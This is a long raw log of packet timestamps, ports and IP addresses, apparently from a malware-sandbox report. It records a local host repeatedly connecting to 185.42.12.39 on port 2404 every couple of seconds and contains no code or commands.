                                                                                                                                                                                            Dec 6, 2024 17:36:39.025852919 CET240450069185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:39.026468992 CET500692404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:39.358719110 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:39.479008913 CET240450070185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:39.480711937 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:39.484477043 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:39.967457056 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:39.975332022 CET240450070185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:40.087624073 CET240450070185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:41.185787916 CET240450070185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:41.264249086 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:41.423572063 CET240450070185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:41.428806067 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:41.430373907 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:41.548803091 CET240450070185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:41.548896074 CET500702404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:41.858477116 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:41.978357077 CET240450071185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:41.982466936 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:41.986860037 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:42.109375000 CET240450071185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:43.312417984 CET240450071185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:43.381072044 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:43.547255993 CET240450071185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:43.550769091 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:43.550846100 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:43.674555063 CET240450071185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:43.674647093 CET500712404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:43.967972040 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:44.088427067 CET240450072185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:44.090482950 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:44.094254971 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:44.216752052 CET240450072185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:45.421555042 CET240450072185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:45.467396021 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:45.655432940 CET240450072185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:45.657672882 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:45.657708883 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:45.777631998 CET240450072185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:45.777724028 CET500722404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:46.061877012 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:46.181864977 CET240450073185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:46.181946039 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:46.187376976 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:46.307456970 CET240450073185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:47.526582003 CET240450073185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:47.620611906 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:47.771168947 CET240450073185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:47.773983955 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:47.774066925 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:47.893892050 CET240450073185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:47.894025087 CET500732404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:48.171103954 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:48.291064024 CET240450074185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:48.291156054 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:48.295090914 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:48.416135073 CET240450074185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:49.628876925 CET240450074185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:49.764287949 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:49.865150928 CET240450074185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:49.868669033 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:49.870398045 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:49.988828897 CET240450074185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:49.988898039 CET500742404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:50.249274015 CET500752404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:50.370064974 CET240450075185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:50.370168924 CET500752404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:50.375334024 CET500752404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:50.495197058 CET240450075185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:51.701220036 CET240450075185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:51.764317989 CET500752404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:51.935266018 CET240450075185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:51.937961102 CET500752404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:51.938070059 CET500752404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:52.057984114 CET240450075185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:52.058370113 CET500752404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:52.311800003 CET500762404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:52.431737900 CET240450076185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:52.431839943 CET500762404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:52.436265945 CET500762404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:52.556175947 CET240450076185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:53.788022995 CET240450076185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:53.837814093 CET500762404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:54.027621984 CET240450076185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:54.030366898 CET500762404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:54.030400038 CET500762404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:54.150727987 CET240450076185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:54.150814056 CET500762404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:54.389947891 CET500772404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:54.509772062 CET240450077185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:54.509869099 CET500772404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:54.515481949 CET500772404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:54.636610031 CET240450077185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:55.840641022 CET240450077185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:55.967513084 CET500772404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:56.084060907 CET240450077185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:56.086847067 CET500772404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:56.086884975 CET500772404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:56.206974983 CET240450077185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:56.207042933 CET500772404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:56.436696053 CET500782404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:56.556754112 CET240450078185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:56.558532000 CET500782404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:56.562335014 CET500782404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:56.683259964 CET240450078185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:58.032922029 CET240450078185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:58.139161110 CET240450078185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:58.142514944 CET500782404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:58.156667948 CET500782404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:58.160540104 CET500782404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:58.276968956 CET240450078185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:58.277467966 CET500782404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:58.499233961 CET500792404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:58.623733997 CET240450079185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:58.623826027 CET500792404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:58.627738953 CET500792404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:36:58.747582912 CET240450079185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:36:59.960469961 CET240450079185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:00.154962063 CET500792404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:00.194880009 CET240450079185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:00.200707912 CET500792404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:00.202404976 CET500792404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:00.321013927 CET240450079185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:00.321109056 CET500792404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:00.530702114 CET500802404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:00.650748968 CET240450080185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:00.650866032 CET500802404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:00.655786991 CET500802404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:00.776156902 CET240450080185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:01.985165119 CET240450080185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:02.154997110 CET500802404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:02.219285965 CET240450080185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:02.221544027 CET500802404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:02.221617937 CET500802404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:02.341619015 CET240450080185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:02.341764927 CET500802404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:02.530695915 CET500812404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:02.650834084 CET240450081185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:02.654546976 CET500812404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:02.658205986 CET500812404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:02.778778076 CET240450081185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:03.981360912 CET240450081185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:04.154927969 CET500812404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:04.219110012 CET240450081185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:04.221338987 CET500812404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:04.222420931 CET500812404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:04.342678070 CET240450081185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:04.342807055 CET500812404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:04.530611038 CET500822404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:04.650480986 CET240450082185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:04.650620937 CET500822404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:04.654365063 CET500822404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:04.774194956 CET240450082185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:06.013463974 CET240450082185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:06.154956102 CET500822404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:06.247137070 CET240450082185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:06.250588894 CET500822404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:06.250632048 CET500822404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:06.370628119 CET240450082185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:06.370699883 CET500822404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:06.546072960 CET500832404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:06.666059971 CET240450083185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:06.666239977 CET500832404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:06.669931889 CET500832404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:06.789942980 CET240450083185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:07.994223118 CET240450083185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:08.072559118 CET500832404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:08.231086969 CET240450083185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:08.233576059 CET500832404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:08.233576059 CET500832404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:08.353964090 CET240450083185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:08.354197979 CET500832404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:08.515012026 CET500842404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:08.634932041 CET240450084185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:08.635127068 CET500842404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:08.638762951 CET500842404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:08.758790970 CET240450084185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:09.984920025 CET240450084185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:10.154958963 CET500842404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:10.219415903 CET240450084185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:10.222023010 CET500842404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:10.222023010 CET500842404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:10.341919899 CET240450084185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:10.342010021 CET500842404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:10.499321938 CET500852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:10.619467020 CET240450085185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:10.619556904 CET500852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:10.624113083 CET500852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:10.743952990 CET240450085185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:11.952408075 CET240450085185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:12.154942036 CET500852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:12.187135935 CET240450085185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:12.197283983 CET500852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:12.197334051 CET500852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:12.318069935 CET240450085185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:12.318150043 CET500852404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:12.469083071 CET500862404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:12.589241982 CET240450086185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:12.589338064 CET500862404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:12.594609976 CET500862404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:12.714634895 CET240450086185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:13.926398993 CET240450086185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:14.061254978 CET500862404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:14.159961939 CET240450086185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:14.163460970 CET500862404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:14.166425943 CET500862404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:14.283237934 CET240450086185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:14.283550024 CET500862404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:14.421056986 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:14.540910006 CET240450087185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:14.541026115 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:14.545455933 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:14.666333914 CET240450087185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:15.887799978 CET240450087185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:15.967473984 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.127171993 CET240450087185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:16.129487038 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.129527092 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.253703117 CET240450087185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:16.253880978 CET500872404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.374254942 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.495871067 CET240450088185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:16.498548985 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.502139091 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:16.622117996 CET240450088185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:17.831861019 CET240450088185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:17.960639000 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.068331003 CET240450088185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:18.116353035 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.116425037 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.236309052 CET240450088185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:18.236377954 CET500882404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.376221895 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.503377914 CET240450089185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:18.503519058 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.508232117 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:18.678874016 CET240450089185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:19.890795946 CET240450089185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:19.967484951 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.123204947 CET240450089185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:20.125659943 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.125725985 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.245470047 CET240450089185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:20.245603085 CET500892404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.358730078 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.479378939 CET240450090185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:20.479554892 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.484055042 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:20.603939056 CET240450090185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:21.821254015 CET240450090185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:21.967521906 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.063939095 CET240450090185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:22.066346884 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.066346884 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.187714100 CET240450090185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:22.187886000 CET500902404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.296135902 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.416904926 CET240450091185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:22.417231083 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.424549103 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:22.544503927 CET240450091185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:23.747515917 CET240450091185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:23.967485905 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:23.983113050 CET240450091185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:23.985323906 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:23.985356092 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:24.105202913 CET240450091185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:24.105297089 CET500912404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:24.202569008 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:24.322474003 CET240450092185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:24.322582960 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:24.326387882 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:24.446266890 CET240450092185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:25.652582884 CET240450092185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:25.764586926 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:25.887375116 CET240450092185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:25.890181065 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:25.890182018 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:26.011172056 CET240450092185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:26.011301994 CET500922404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:26.108665943 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:26.230360985 CET240450093185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:26.230669022 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:26.236493111 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:26.357255936 CET240450093185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:27.569355011 CET240450093185.42.12.39192.168.2.4
                                                                                                                                                                                            Dec 6, 2024 17:37:27.655095100 CET500932404192.168.2.4185.42.12.39
                                                                                                                                                                                            Dec 6, 2024 17:37:27.803343058 CET240450093185.42.12.39192.168.2.4
